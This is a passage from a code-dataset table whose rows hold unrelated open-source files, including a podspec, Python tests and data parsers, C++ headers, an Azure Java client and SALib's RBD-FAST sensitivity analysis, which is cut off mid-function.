max_stars_count (int64, 301 – 224k) | text (string, lengths 6 – 1.05M) | token_count (int64, 3 – 727k) |
---|---|---|
5,169 |
{
"name": "JDKeplerSDK-wsgw",
"version": "2.2.5",
"summary": "京东开普勒sdk(网上国网).",
"description": "京东开普勒SDK(网上国网:com.wsgw.zsdl95598)",
"homepage": "https://github.com/kevincwt/JDKeplerSDK-wsgw.git",
"license": {
"type": "MIT",
"file": "LICENSE"
},
"authors": {
"wtchang": "<EMAIL>"
},
"platforms": {
"ios": "10.0"
},
"source": {
"git": "https://github.com/kevincwt/JDKeplerSDK-wsgw.git",
"tag": "2.2.5"
},
"resources": "Framework/Kepler.bundle",
"ios": {
"vendored_frameworks": "Framework/JDKeplerSDK.framework"
},
"frameworks": [
"UIKit",
"Foundation",
"JavaScriptCore",
"SystemConfiguration"
],
"libraries": [
"z",
"sqlite3.0"
],
"deprecated": true
}
| 395 |
11,433 |
<gh_stars>1000+
from allennlp.data.tokenizers import CharacterTokenizer
tokenizer = CharacterTokenizer()
passage = (
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor "
"incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis "
"nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. "
"Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu "
"fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in "
"culpa qui officia deserunt mollit anim id est laborum."
)
def bench_character_tokenizer(benchmark):
benchmark(tokenizer.tokenize, passage)
| 255 |
5,129 |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import tempfile
import unittest
import torch
from fairseq.data import Dictionary
class TestDictionary(unittest.TestCase):
def test_finalize(self):
txt = [
'A B C D',
'B C D',
'C D',
'D',
]
ref_ids1 = list(map(torch.IntTensor, [
[4, 5, 6, 7, 2],
[5, 6, 7, 2],
[6, 7, 2],
[7, 2],
]))
ref_ids2 = list(map(torch.IntTensor, [
[7, 6, 5, 4, 2],
[6, 5, 4, 2],
[5, 4, 2],
[4, 2],
]))
# build dictionary
d = Dictionary()
for line in txt:
d.encode_line(line, add_if_not_exist=True)
def get_ids(dictionary):
ids = []
for line in txt:
ids.append(dictionary.encode_line(line, add_if_not_exist=False))
return ids
def assertMatch(ids, ref_ids):
for toks, ref_toks in zip(ids, ref_ids):
self.assertEqual(toks.size(), ref_toks.size())
self.assertEqual(0, (toks != ref_toks).sum().item())
ids = get_ids(d)
assertMatch(ids, ref_ids1)
# check finalized dictionary
d.finalize()
finalized_ids = get_ids(d)
assertMatch(finalized_ids, ref_ids2)
# write to disk and reload
with tempfile.NamedTemporaryFile(mode='w') as tmp_dict:
d.save(tmp_dict.name)
d = Dictionary.load(tmp_dict.name)
reload_ids = get_ids(d)
assertMatch(reload_ids, ref_ids2)
assertMatch(finalized_ids, reload_ids)
if __name__ == '__main__':
unittest.main()
| 981 |
561 |
<filename>app/css.py<gh_stars>100-1000
# Copyright 2013 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from model import *
from utils import *
class Handler(BaseHandler):
repo_required = False
ignore_deactivation = True
def get(self):
self.response.headers['Content-Type'] = 'text/css; charset=utf-8'
if self.env.ui in ['small', 'light']:
template_name = 'css-%s' % self.env.ui
else:
template_name = 'css-default'
self.render(
template_name,
start='right' if self.env.rtl else 'left',
end='left' if self.env.rtl else 'right')
| 409 |
5,937 |
<gh_stars>1000+
// Licensed to the .NET Foundation under one or more agreements.
// The .NET Foundation licenses this file to you under the MIT license.
// See the LICENSE file in the project root for more information.
#pragma once
#include "dxlcommon.hpp"
#include <d3d9types.h>
#include <DirectXMath.h>
namespace dxlayer
{
// D3DX9 compatible base types.
//
// These definitions will stand-in for platform-specific types
// used in our implementation of wpfgfx.
//
// We use D3DX9 compatible (in terms of size and layout) types here
// rather than the types supplied by the DirectX Math library
// because our codebase depends on such conformity. For e.g.,
// there are places in our codebase where we pass around arrays of
// objects as a BYTE* and reinterpret_cast<> as needed, do pointer
// arithmetic on such BYTE* pointers etc.
//
// Note:
// The individual types declared below are defined
// in base/<typename>.hpp, and are all included in
// factories/xmfactory.hpp
template<>
struct basetypes<dxapi::xmath>
{
// Describes a two-component vector, and includes
// constructors and operators compatible with the
// D3DXVECTOR2 type.
struct vector2_base_t;
// Describes a three-component vector, and includes
// constructors and operators compatible with the
// D3DXVECTOR3 type.
struct vector3_base_t;
        // Describes a four-component vector, and includes
        // constructors and operators compatible with the
        // D3DXVECTOR4 type.
struct vector4_base_t;
// Describes a quaternion that is
// compatible in size and layout with D3DXQUATERNION
struct quaternion_base_t;
// Describes a 4x4 matrix
// This is based on the D3DMATRIX types
struct matrix_base_t;
// Describes color values in a manner compatible
// in size and layout with D3DCOLORVALUE struct and
// D3DXCOLOR extensions.
struct color_base_t;
};
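    // Illustrative sketch (not part of this header) of the layout requirement
    // described above; the buffer source and element count are hypothetical:
    //
    //   using vec3 = basetypes<dxapi::xmath>::vector3_base_t;
    //   BYTE* pBytes = GetSomeBuffer();                  // hypothetical BYTE* source
    //   vec3* pVecs  = reinterpret_cast<vec3*>(pBytes);  // relies on D3DXVECTOR3-compatible size/layout
    //   pVecs += 2;                                      // pointer arithmetic in D3DXVECTOR3-sized strides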
}
| 773 |
348 |
<reponame>chamberone/Leaflet.PixiOverlay<gh_stars>100-1000
{"nom":"Charnas","circ":"2ème circonscription","dpt":"Ardèche","inscrits":639,"abs":339,"votants":300,"blancs":12,"nuls":4,"exp":284,"res":[{"nuance":"SOC","nom":"<NAME>","voix":213},{"nuance":"REM","nom":"<NAME>","voix":71}]}
| 119 |
644 |
{
"name": "frint-data-validation",
"version": "5.7.2",
"description": "Validation for Models in FrintJS",
"main": "lib/index.js",
"homepage": "https://github.com/frintjs/frint/tree/master/packages/frint-data-validation",
"scripts": {
"lint": "cross-env ../../node_modules/.bin/eslint --color '{src,test}/**/*.js'",
"transpile": "cross-env ../../node_modules/.bin/babel src --out-dir lib",
"test": "cross-env ../../node_modules/.bin/mocha --colors --compilers js:babel-register --recursive ./src/**/*.spec.js",
"cover:run": "cross-env ../../node_modules/.bin/nyc --reporter=json --require babel-register ../../node_modules/.bin/mocha --colors --compilers js:babel-register --recursive ./src/**/*.spec.js",
"cover:report": "cross-env ../../node_modules/.bin/nyc report",
"cover": "npm run cover:run && npm run cover:report",
"dist:lib": "cross-env ../../node_modules/.bin/webpack --config ./webpack.config.js",
"dist:min": "cross-env DIST_MIN=1 ../../node_modules/.bin/webpack --config ./webpack.config.js",
"dist": "npm run dist:lib && npm run dist:min",
"prepublish": "npm run transpile"
},
"repository": {
"type": "git",
"url": "git+https://github.com/frintjs/frint.git"
},
"author": "FrintJS Authors (https://github.com/frintjs/frint/graphs/contributors)",
"keywords": [
"frint"
],
"bugs": {
"url": "https://github.com/frintjs/frint/issues"
},
"dependencies": {
"lodash": "^4.13.1",
"rxjs": "^5.5.0"
},
"devDependencies": {
"cross-env": "^5.0.5",
"frint-config": "^5.7.2",
"frint-data": "^5.7.2"
},
"license": "MIT"
}
| 689 |
430 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from pathlib import Path
from typing import Any, Dict, List
from pandas import DataFrame, concat
from lib.cast import age_group, safe_int_cast
from lib.data_source import DataSource
from lib.io import read_file
from lib.constants import SRC
from lib.concurrent import thread_map
from lib.time import datetime_isoformat
from lib.utils import table_rename
_dashboard_column_adapter = {
"key": "key",
"date": "date",
"casConfirmes": "total_confirmed",
"deces": "total_deceased",
"testsPositifs": "new_confirmed",
"testsRealises": "new_tested",
"gueris": "new_recovered",
"hospitalises": "current_hospitalized",
"reanimation": "current_intensive_care",
}
_gouv_column_adapter = {
"date": "date",
"dep": "subregion2_code",
"reg": "subregion1_code",
"hosp": "current_hospitalized",
"incid_hosp": "new_hospitalized",
"rea": "current_intensive_care",
"incid_rea": "new_intensive_care",
"dc_tot": "total_deceased",
"conf": "total_confirmed",
"conf_j1": "new_confirmed",
}
def _get_region(
url_tpl: str, column_adapter: Dict[str, str], iso_map: Dict[str, str], subregion1_code: str
):
code = iso_map[subregion1_code]
data = read_file(url_tpl.format(code))
data["key"] = f"FR_{subregion1_code}"
return table_rename(data, column_adapter, drop=True)
def _get_department(url_tpl: str, column_adapter: Dict[str, str], record: Dict[str, str]):
subregion1_code = record["subregion1_code"]
subregion2_code = record["subregion2_code"]
code = f"DEP-{subregion2_code}"
data = read_file(url_tpl.format(code))
data["key"] = f"FR_{subregion1_code}_{subregion2_code}"
return table_rename(data, column_adapter, drop=True)
def _get_country(url_tpl: str, column_adapter: Dict[str, str]):
data = read_file(url_tpl.format("FRA"))
data["key"] = "FR"
return table_rename(data, column_adapter, drop=True)
class FranceDashboardDataSource(DataSource):
def fetch(
self,
output_folder: Path,
cache: Dict[str, str],
fetch_opts: List[Dict[str, Any]],
skip_existing: bool = False,
) -> Dict[Any, str]:
# URL is just a template, so pass-through the URL to parse manually
return {idx: source["url"] for idx, source in enumerate(fetch_opts)}
def parse(self, sources: Dict[Any, str], aux: Dict[str, DataFrame], **parse_opts) -> DataFrame:
url_tpl = sources[0]
metadata = aux["metadata"]
metadata = metadata[metadata["country_code"] == "FR"]
fr_isos = read_file(SRC / "data" / "fr_iso_codes.csv")
fr_iso_map = {iso: code for iso, code in zip(fr_isos["iso_code"], fr_isos["region_code"])}
fr_codes = metadata[["subregion1_code", "subregion2_code"]].dropna()
regions_iter = fr_codes["subregion1_code"].unique()
deps_iter = [record for _, record in fr_codes.iterrows()]
# For country level, there is no need to estimate confirmed from tests
column_adapter_country = dict(_dashboard_column_adapter)
column_adapter_country.pop("testsPositifs")
# Get country level data
country = _get_country(url_tpl, column_adapter_country)
# Country level data has totals instead of diffs, so we compute the diffs by hand
country.sort_values("date", inplace=True)
country["new_confirmed"] = country["total_confirmed"].diff()
country.drop(columns=["total_confirmed"], inplace=True)
# For region level, we can only estimate confirmed from tests
column_adapter_region = dict(_dashboard_column_adapter)
column_adapter_region.pop("casConfirmes")
# Get region level data
get_region_func = partial(_get_region, url_tpl, column_adapter_region, fr_iso_map)
regions = concat(list(thread_map(get_region_func, regions_iter)))
# Get department level data
get_department_func = partial(_get_department, url_tpl, column_adapter_region)
departments = concat(list(thread_map(get_department_func, deps_iter)))
data = concat([country, regions, departments])
data["date"] = data["date"].apply(lambda x: datetime_isoformat(x, "%Y-%m-%d %H:%M:%S"))
return data.sort_values("date")
class FranceStratifiedDataSource(FranceDashboardDataSource):
def parse(self, sources: Dict[Any, str], aux: Dict[str, DataFrame], **parse_opts) -> DataFrame:
url_tpl = sources[0]
metadata = aux["metadata"]
metadata = metadata[metadata["country_code"] == "FR"]
fr_isos = read_file(SRC / "data" / "fr_iso_codes.csv")
fr_iso_map = {iso: code for iso, code in zip(fr_isos["iso_code"], fr_isos["region_code"])}
fr_codes = metadata[["subregion1_code", "subregion2_code"]].dropna()
regions_iter = fr_codes["subregion1_code"].unique()
deps_iter = [record for _, record in fr_codes.iterrows()]
column_adapter = {
"key": "key",
"date": "date",
"testsRealisesDetails": "_breakdown_tested",
"testsPositifsDetails": "_breakdown_confirmed",
}
# Get country level data
country = _get_country(url_tpl, column_adapter)
# Get region level data
get_region_func = partial(_get_region, url_tpl, column_adapter, fr_iso_map)
regions = concat(list(thread_map(get_region_func, regions_iter)))
# Get department level data
get_department_func = partial(_get_department, url_tpl, column_adapter)
departments = concat(list(thread_map(get_department_func, deps_iter)))
data = concat([country, regions, departments])
data["date"] = data["date"].apply(lambda x: datetime_isoformat(x, "%Y-%m-%d %H:%M:%S"))
data["_breakdown_tested"].fillna("", inplace=True)
data["_breakdown_confirmed"].fillna("", inplace=True)
records: Dict[str, List] = {"confirmed": [], "tested": []}
for key, row in data.set_index("key").iterrows():
for statistic in records.keys():
if row[f"_breakdown_{statistic}"] != "":
for item in row[f"_breakdown_{statistic}"]:
records[statistic].append(
{
"key": key,
"date": row["date"],
"age": item["age"],
"sex": item.get("sexe"),
f"new_{statistic}": item["value"],
}
)
df1 = DataFrame.from_records(records["tested"])
df2 = DataFrame.from_records(records["confirmed"])
data = df1.merge(df2, how="outer")
data = data[~data["age"].isin(["0", "A", "B", "C", "D", "E"])]
data["age"] = data["age"].apply(lambda x: age_group(safe_int_cast(x)))
sex_adapter = lambda x: {"h": "male", "f": "female"}.get(x, "sex_unknown")
data["sex"] = data["sex"].apply(sex_adapter)
return data
class FranceCountryDataSource(DataSource):
def parse_dataframes(
self, dataframes: Dict[Any, DataFrame], aux: Dict[str, DataFrame], **parse_opts
) -> DataFrame:
data = table_rename(dataframes[0], _gouv_column_adapter, drop=True)
data["key"] = "FR"
return data
| 3,345 |
6,989 |
/*
Copyright (c) 2020-2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#ifndef __TBB_small_object_pool_impl_H
#define __TBB_small_object_pool_impl_H
#include "oneapi/tbb/detail/_small_object_pool.h"
#include "oneapi/tbb/detail/_utils.h"
#include <cstddef>
#include <cstdint>
#include <atomic>
namespace tbb {
namespace detail {
namespace r1 {
class thread_data;
class small_object_pool_impl : public d1::small_object_pool
{
static constexpr std::size_t small_object_size = 256;
struct small_object {
small_object* next;
};
static small_object* const dead_public_list;
public:
void* allocate_impl(small_object_pool*& allocator, std::size_t number_of_bytes);
void deallocate_impl(void* ptr, std::size_t number_of_bytes, thread_data& td);
void destroy();
private:
static std::int64_t cleanup_list(small_object* list);
~small_object_pool_impl() = default;
private:
alignas(max_nfs_size) small_object* m_private_list;
std::int64_t m_private_counter{};
alignas(max_nfs_size) std::atomic<small_object*> m_public_list;
std::atomic<std::int64_t> m_public_counter{};
};
} // namespace r1
} // namespace detail
} // namespace tbb
#endif /* __TBB_small_object_pool_impl_H */
| 626 |
1,350 |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.resourcemanager.devtestlabs.implementation;
import com.azure.core.http.rest.PagedIterable;
import com.azure.core.http.rest.Response;
import com.azure.core.http.rest.SimpleResponse;
import com.azure.core.util.Context;
import com.azure.core.util.logging.ClientLogger;
import com.azure.resourcemanager.devtestlabs.fluent.VirtualMachineSchedulesClient;
import com.azure.resourcemanager.devtestlabs.fluent.models.ScheduleInner;
import com.azure.resourcemanager.devtestlabs.models.Schedule;
import com.azure.resourcemanager.devtestlabs.models.ScheduleFragment;
import com.azure.resourcemanager.devtestlabs.models.VirtualMachineSchedules;
import com.fasterxml.jackson.annotation.JsonIgnore;
public final class VirtualMachineSchedulesImpl implements VirtualMachineSchedules {
@JsonIgnore private final ClientLogger logger = new ClientLogger(VirtualMachineSchedulesImpl.class);
private final VirtualMachineSchedulesClient innerClient;
private final com.azure.resourcemanager.devtestlabs.DevTestLabsManager serviceManager;
public VirtualMachineSchedulesImpl(
VirtualMachineSchedulesClient innerClient,
com.azure.resourcemanager.devtestlabs.DevTestLabsManager serviceManager) {
this.innerClient = innerClient;
this.serviceManager = serviceManager;
}
public PagedIterable<Schedule> list(String resourceGroupName, String labName, String virtualMachineName) {
PagedIterable<ScheduleInner> inner = this.serviceClient().list(resourceGroupName, labName, virtualMachineName);
return Utils.mapPage(inner, inner1 -> new ScheduleImpl(inner1, this.manager()));
}
public PagedIterable<Schedule> list(
String resourceGroupName,
String labName,
String virtualMachineName,
String expand,
String filter,
Integer top,
String orderby,
Context context) {
PagedIterable<ScheduleInner> inner =
this
.serviceClient()
.list(resourceGroupName, labName, virtualMachineName, expand, filter, top, orderby, context);
return Utils.mapPage(inner, inner1 -> new ScheduleImpl(inner1, this.manager()));
}
public Schedule get(String resourceGroupName, String labName, String virtualMachineName, String name) {
ScheduleInner inner = this.serviceClient().get(resourceGroupName, labName, virtualMachineName, name);
if (inner != null) {
return new ScheduleImpl(inner, this.manager());
} else {
return null;
}
}
public Response<Schedule> getWithResponse(
String resourceGroupName,
String labName,
String virtualMachineName,
String name,
String expand,
Context context) {
Response<ScheduleInner> inner =
this.serviceClient().getWithResponse(resourceGroupName, labName, virtualMachineName, name, expand, context);
if (inner != null) {
return new SimpleResponse<>(
inner.getRequest(),
inner.getStatusCode(),
inner.getHeaders(),
new ScheduleImpl(inner.getValue(), this.manager()));
} else {
return null;
}
}
public Schedule createOrUpdate(
String resourceGroupName, String labName, String virtualMachineName, String name, ScheduleInner schedule) {
ScheduleInner inner =
this.serviceClient().createOrUpdate(resourceGroupName, labName, virtualMachineName, name, schedule);
if (inner != null) {
return new ScheduleImpl(inner, this.manager());
} else {
return null;
}
}
public Response<Schedule> createOrUpdateWithResponse(
String resourceGroupName,
String labName,
String virtualMachineName,
String name,
ScheduleInner schedule,
Context context) {
Response<ScheduleInner> inner =
this
.serviceClient()
.createOrUpdateWithResponse(resourceGroupName, labName, virtualMachineName, name, schedule, context);
if (inner != null) {
return new SimpleResponse<>(
inner.getRequest(),
inner.getStatusCode(),
inner.getHeaders(),
new ScheduleImpl(inner.getValue(), this.manager()));
} else {
return null;
}
}
public void delete(String resourceGroupName, String labName, String virtualMachineName, String name) {
this.serviceClient().delete(resourceGroupName, labName, virtualMachineName, name);
}
public Response<Void> deleteWithResponse(
String resourceGroupName, String labName, String virtualMachineName, String name, Context context) {
return this.serviceClient().deleteWithResponse(resourceGroupName, labName, virtualMachineName, name, context);
}
public Schedule update(
String resourceGroupName, String labName, String virtualMachineName, String name, ScheduleFragment schedule) {
ScheduleInner inner =
this.serviceClient().update(resourceGroupName, labName, virtualMachineName, name, schedule);
if (inner != null) {
return new ScheduleImpl(inner, this.manager());
} else {
return null;
}
}
public Response<Schedule> updateWithResponse(
String resourceGroupName,
String labName,
String virtualMachineName,
String name,
ScheduleFragment schedule,
Context context) {
Response<ScheduleInner> inner =
this
.serviceClient()
.updateWithResponse(resourceGroupName, labName, virtualMachineName, name, schedule, context);
if (inner != null) {
return new SimpleResponse<>(
inner.getRequest(),
inner.getStatusCode(),
inner.getHeaders(),
new ScheduleImpl(inner.getValue(), this.manager()));
} else {
return null;
}
}
public void execute(String resourceGroupName, String labName, String virtualMachineName, String name) {
this.serviceClient().execute(resourceGroupName, labName, virtualMachineName, name);
}
public void execute(
String resourceGroupName, String labName, String virtualMachineName, String name, Context context) {
this.serviceClient().execute(resourceGroupName, labName, virtualMachineName, name, context);
}
private VirtualMachineSchedulesClient serviceClient() {
return this.innerClient;
}
private com.azure.resourcemanager.devtestlabs.DevTestLabsManager manager() {
return this.serviceManager;
}
}
| 2,623 |
1,756 |
"""
** deeplean-ai.com **
** dl-lab **
created by :: GauravBh1010tt
"""
import pandas as pd
import numpy as np
import re
#from tqdm import tqdm
from nltk.corpus import wordnet
from nltk import bigrams, trigrams
from collections import Counter, defaultdict
from gensim.models import Word2Vec
from scipy.spatial.distance import cosine as cos
from stop_words import get_stop_words
from gensim import corpora, models
from nltk.tokenize import RegexpTokenizer
tokenizer = RegexpTokenizer(r'\w+')
def tokenize(sent):
    return [x.strip() for x in re.split(r'(\W+)', sent) if x.strip()]
#Number Of Words In A String(Returns Integer):
def length(val):
return len(val.split())
#Whether A String Is Subset Of Other(Returns 1 and 0):
def substringCheck(sen_A, sen_B):
if sen_A in sen_B or sen_B in sen_A:
return 1
else:
return 0
#Number Of Same Words In Two Sentences(Returns Float):
def overlap(sen_A, sen_B):
a = sen_A.split()
b = sen_B.split()
count = 0
for word_a in a:
for word_b in b:
if(word_a == word_b):
count += 1
return count
#Number Of Synonyms In Two Sentences(Returns Float):
def overlapSyn(sen_A, sen_B):
a = sen_A.split()
b = sen_B.split()
word_synonyms = []
for word in a:
for synset in wordnet.synsets(word):
for lemma in synset.lemma_names():
if lemma in b and lemma != word:
word_synonyms.append(lemma)
return len(word_synonyms)
#Forming Bag Of Words[BOW][Returns BOW Dictionary]:
def train_BOW(lst):
temp = []
for sent in lst:
temp.extend(sent.split())
counts = Counter(temp)
total_count = len(set(temp))
for word in counts:
counts[word] /= float(total_count)
return counts
#Sum Of BOW Values For A Sent[Returns Float]:
def Sum_BOW(sent, dic):
tot = 0.0
for word in sent.split():
try:
tot += dic[word]
except:
continue
return tot
#Training Bigram Model[Returns Dictionary of Dictionaries]:
def train_bigram(lst):
model = defaultdict(lambda: defaultdict(lambda: 0))
for sent in lst:
sent = sent.split()
for w1, w2 in bigrams(sent, pad_right=True, pad_left=True):
model[w1][w2] += 1
total_count = 0
for w1 in model:
total_count = float(sum(model[w1].values()))
for w2 in model[w1]:
model[w1][w2] /= total_count
return model
#Total Sum Of Bigram Probability Of A Sentence[Returns Float]:
def sum_bigram(sent, model):
sent = sent.split()
first = True
tot = 0
for i in range(len(sent)):
try:
if first:
tot += model[None][sent[i]]
first = False
else:
tot += model[sent[i-1]][sent[i]]
except:
continue
return tot
#Training Trigram Model[Returns Dictionary of Dictionaries]:
def train_trigram(lst):
model = defaultdict(lambda: defaultdict(lambda: 0))
for sent in lst:
sent = sent.split()
for w1, w2, w3 in trigrams(sent, pad_right=True, pad_left=True):
            model[(w1, w2)][w3] += 1
total_count = 0
for w1,w2 in model:
total_count = float(sum(model[(w1, w2)].values()))
for w3 in model[(w1,w2)]:
            model[(w1, w2)][w3] /= total_count
    return model
#Total Sum Of Trigram Probability Of A Sentence[Returns Float]:
def sum_trigram(sent, model):
sent = sent.split()
first = True
second = True
tot = 0
for i in range(len(sent)):
try:
if first:
tot += model[None, None][sent[i]]
first = False
elif second:
tot += model[None, sent[i-1]][sent[i]]
second = False
else:
tot += model[sent[i-2], sent[i-1]][sent[i]]
except:
continue
return tot
#Word2Vec Training(Returns Vector):
def W2V_train(lst1, lst2):
vocab = []
for i in range(len(lst1)):
w1 = lst1[i]
w2 = lst2[i]
vocab.append(w1.split())
vocab.append(w2.split())
for temp in vocab:
for j in range(len(temp)):
temp[j] = temp[j].lower()
return Word2Vec(vocab)
#Returns The Difference Between Word2Vec Sum Of All The Words In Two Sentences(Returns Vec):
def W2V_Vec(sent_A, sent_B, vec):
    if len(sent_A) <= 1:
        sent_A += 'none'
    if len(sent_B) <= 1:
        sent_B += 'none'
vec1 = 0
vec2 = 0
sent_A = tokenize(sent_A)
sent_B = tokenize(sent_B)
for word in sent_A:
if word not in ", . ? ! # $ % ^ & * ( ) { } [ ]".split():
try:
vec1 += vec[word]
except:
continue
for word in sent_B:
if word not in ", . ? ! # $ % ^ & * ( ) { } [ ]".split():
try:
vec2 += vec[word]
except:
continue
try:
result = cos(vec1, vec2)
except:
result = 0.0
if np.isnan(result):
return 0.0
else:
return result
#Trains LDA Model (Returns Model):
def LDA_train(doc):
red = []
en_stop = get_stop_words('en')
for d in doc:
try:
raw = d.lower()
tokens = tokenizer.tokenize(raw)
stopped_tokens = [i for i in tokens if not i in en_stop]
red.append(stopped_tokens)
except:
continue
print("Forming Dictionary.....")
dictionary = corpora.Dictionary(red)
print("Forming Corpus.....")
corpus = [dictionary.doc2bow(text) for text in red]
print("Training Model.....")
lda = models.ldamodel.LdaModel(corpus, num_topics=10, id2word = dictionary, passes=1)
return lda
#Returns Average Of Probablity Of Word Present In LDA Model For Input Document(Returns Float):
def LDA(doc1, doc2, lda):
word = pd.DataFrame()
weight = pd.DataFrame()
vec1 = []
vec2 = []
for i in range(10):
vec1.append(0)
vec2.append(0)
for i in range(10):
a = []
wrd = []
wgt = []
for x in lda.print_topic(i).split():
if x != '+':
a.append(x)
for w in a:
t = w.split("*")
wrd.append(t[1][1:-1])
wgt.append(float(t[0]))
word[i] = wrd
weight[i] = wgt
num = 0
wrd1 = []
wrd2 = []
# print 'Vector Formation for doc1.....'
for d in doc1.split():
for i in range(10):
for j in range(10):
if d.lower() == word[i][j]:
vec1[j] += float(weight[i][j])
wrd1.append(word[i][j])
# print 'Vector Formation for doc2.....'
for d in doc2.split():
for i in range(10):
for j in range(10):
if d.lower() == word[i][j]:
vec2[i] += float(weight[i][j])
wrd2.append(word[i][j])
v1 = 0.0
v2 = 0.0
for i in range(10):
if vec1[i] >= v1:
t1 = i
v1 = vec1[i]
if vec2[i] >= v2:
t2 = i
v2 = vec2[i]
wrd1_list = list(set(wrd1))
wrd2_list = list(set(wrd2))
w1_len = len(wrd1_list)
w2_len = len(wrd2_list)
w1_new = []
w2_new = []
for i in range(w1_len):
d = wrd1_list[i]
for i in range(10):
if d != word[t2][i]:
w1_new.append(d)
for i in range(w2_len):
d = wrd2_list[i]
for i in range(10):
if d != word[t1][i]:
w2_new.append(d)
num = len(list(set(w1_new))) + len(set(w2_new))
try:
return num
except:
return 0.0
| 3,947 |
515 |
<gh_stars>100-1000
# Copyright (c) 2013-2021 <NAME>
# License: MIT License
from pathlib import Path
import ezdxf
OUTBOX = Path("~/Desktop/Outbox").expanduser()
doc = ezdxf.new("R2007", setup=True)
msp = doc.modelspace()
attribs = {
"char_height": 0.7,
"width": 5.0,
"style": "OpenSans",
}
msp.add_line((-10, -1), (10, -2))
mtext = msp.add_mtext("This is a long MTEXT line with line wrapping!", attribs)
mtext.set_bg_color((108, 204, 193))
# line break \P
msp.add_mtext("Line 1\\PLine 2", attribs).set_location(insert=(0, 10))
attribs["width"] = 15
text = (
"normal \\Oover strike\\o normal\\Pnormal \\Kstrike trough\\k normal"
"\\Pnormal \\Lunder line\\l normal"
)
msp.add_mtext(text, attribs).set_location(insert=(0, 15))
# see example "mtext_editor.py" how to use the MTextEditor to create the same
# result without complicated escape sequences.
filename = "mtext.dxf"
doc.saveas(OUTBOX / filename)
print(f"saved {filename}")
| 374 |
573 |
<gh_stars>100-1000
#!/usr/bin/env python
# coding=utf8
import numpy as np
from scipy.signal import periodogram
from scipy.stats import norm
from . import common_args
from ..util import read_param_file, ResultDict
def analyze(problem, X, Y, M=10, num_resamples=100, conf_level=0.95, print_to_console=False, seed=None):
"""Performs the Random Balanced Design - Fourier Amplitude Sensitivity Test
(RBD-FAST) on model outputs.
Returns a dictionary with keys 'S1', where each entry is a list of
size D (the number of parameters) containing the indices in the same order
as the parameter file.
Notes
-----
Compatible with:
all samplers
Parameters
----------
problem : dict
The problem definition
X : numpy.array
A NumPy array containing the model inputs
Y : numpy.array
A NumPy array containing the model outputs
M : int
The interference parameter, i.e., the number of harmonics to sum in
the Fourier series decomposition (default 10)
print_to_console : bool
Print results directly to console (default False)
References
----------
.. [1] <NAME>, <NAME> and <NAME> (2006) "Random Balance Designs
for the Estimation of First Order Global Sensitivity Indices",
Reliability Engineering and System Safety, 91:6, 717-727
.. [2] <NAME> (2010) "An effective algorithm for computing global
sensitivity indices (EASI) Reliability Engineering & System Safety",
95:4, 354-360. doi:10.1016/j.ress.2009.11.005
.. [3] <NAME>, <NAME> (2012) "Bias correction for the
estimation of sensitivity indices based on random balance designs.",
Reliability Engineering and System Safety, Elsevier, 107, 205-213.
doi:10.1016/j.ress.2012.06.010
.. [4] <NAME>, <NAME> & <NAME> (2015)
"Uncertainty and sensitivity analysis applied to hygrothermal
simulation of a brick building in a hot and humid climate",
Journal of Building Performance Simulation.
doi:10.1080/19401493.2015.1112430
Examples
--------
>>> X = latin.sample(problem, 1000)
>>> Y = Ishigami.evaluate(X)
>>> Si = rbd_fast.analyze(problem, X, Y, print_to_console=False)
"""
if seed:
np.random.seed(seed)
D = problem['num_vars']
N = Y.size
# Calculate and Output the First Order Value
Si = ResultDict((k, [None] * D) for k in ['S1', 'S1_conf'])
Si['names'] = problem['names']
for i in range(D):
S1 = compute_first_order(permute_outputs(X[:, i], Y), M)
S1 = unskew_S1(S1, M, N)
Si['S1'][i] = S1
Si['S1_conf'][i] = bootstrap(X[:, i], Y, M, num_resamples, conf_level)
if print_to_console:
print(Si.to_df())
return Si
def permute_outputs(X, Y):
"""
Permute the output according to one of the inputs as in [_2]
References
----------
.. [2] <NAME> (2010) "An effective algorithm for computing global
sensitivity indices (EASI) Reliability Engineering & System Safety",
95:4, 354-360. doi:10.1016/j.ress.2009.11.005
"""
permutation_index = np.argsort(X)
permutation_index = np.concatenate([permutation_index[::2],
permutation_index[1::2][::-1]])
return Y[permutation_index]
def compute_first_order(permuted_outputs, M):
_, Pxx = periodogram(permuted_outputs)
V = np.sum(Pxx[1:])
D1 = np.sum(Pxx[1: M + 1])
return D1 / V
def unskew_S1(S1, M, N):
"""
    Unskew the sensitivity index
(<NAME>, <NAME> (2012) "Bias correction for the
estimation of sensitivity indices based on random balance designs.",
Reliability Engineering and System Safety, Elsevier, 107, 205-213.
doi:10.1016/j.ress.2012.06.010)
"""
lamb = (2 * M) / N
return S1 - lamb / (1 - lamb) * (1 - S1)
def bootstrap(X_d, Y, M, resamples, conf_level):
# Use half of available data each time
T_data = X_d.shape[0]
n_size = int(T_data * 0.5)
res = np.zeros(resamples)
for i in range(resamples):
